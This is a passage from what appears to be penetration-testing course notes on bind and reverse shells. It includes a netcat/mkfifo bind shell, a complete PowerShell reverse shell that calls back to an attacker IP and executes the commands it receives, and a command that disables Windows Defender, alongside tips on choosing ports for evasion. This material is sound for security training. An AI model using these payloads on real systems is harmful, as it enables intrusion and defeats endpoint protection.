> For the complete documentation index, see [llms.txt](https://edu.noirchapeau.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://edu.noirchapeau.com/shells-and-payloads-shell-overview.md).

# Shells & Payloads: Shell Overview

## Introduction

* **Shell Definition**: Programs providing CLI (Command Line Interface) access to systems
  * Common terminology: "catching" or "popping" a shell = successful remote access
  * Primary goal: Obtain interactive system control for:
    * Privilege escalation
    * System pivoting
    * File transfers
    * Persistence establishment

## Shell Types Overview

### 1. Bind Shells

* **Definition**: Listener running on target system awaiting attacker connection
* **Key Characteristics**:
  * Requires target to run listener
  * Often blocked by firewalls
  * Best suited for internal network testing

#### Basic Bind Shell Setup

```bash
# On target system (listener):
nc -lvnp 7777

# On attacker system (client):
nc -nv <target-IP> 7777
```

#### Interactive Bind Shell Setup

```bash
# On target system:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <target-IP> 7777 > /tmp/f
```

### 2. Reverse Shells

* **Definition**: Target initiates connection to attacker's system
* **Advantages**:
  * Better firewall bypass (uses outbound connections)
  * More successful in real-world scenarios
  * Easier to maintain persistence

#### Basic Reverse Shell Setup

```bash
# On attacker system (listener):
sudo nc -lvnp 443

# On Windows target (PowerShell):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker-IP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

## Shell Environment Identification

### Common Terminal Emulators

* **Windows**: Windows Terminal, cmder, PuTTY
* **Linux**: xterm, GNOME Terminal, Konsole
* **MacOS**: Terminal, iTerm2
* **Cross-platform**: kitty, Alacritty

### Shell Recognition Commands

```bash
# View current shell process
ps

# Check shell environment variables
env | grep SHELL
```

## Best Practices & Tips

### 1. Port Selection

* Use common ports for better evasion:
  * 443 (HTTPS)
  * 80 (HTTP)
  * Avoid suspicious uncommon ports

### 2. Antivirus Evasion

```powershell
# Disable Windows Defender (if needed)
Set-MpPreference -DisableRealtimeMonitoring $true
```

### 3. Firewall Considerations

* Bind shells:
  * Require incoming connections
  * Often blocked by firewalls
  * Best for internal testing
* Reverse shells:
  * Use outbound connections
  * Better success rate
  * Preferred for external testing

### 4. Shell Stabilization

* Consider using:
  * Named pipes for persistence
  * Error handling for stability
  * Proper cleanup after session

## Payload Types

* Network data packets
* Programming instructions
* Various malware forms
* Command execution scripts

## Security Implications

* Shells provide direct OS access
* Enable system command control
* Facilitate data exfiltration
* Allow privilege escalation
* Support lateral movement

## Quick Reference

### Common Shell Indicators

* `$` prompt = Bash/Ksh/POSIX shell
* `>` prompt = Windows CMD
* `PS>` prompt = PowerShell

### Key Commands Cheatsheet

```bash
# Basic listener
nc -lvnp <port>

# Basic connection
nc -nv <IP> <port>

# Check current shell
echo $SHELL

# Create named pipe
mkfifo /tmp/f
```
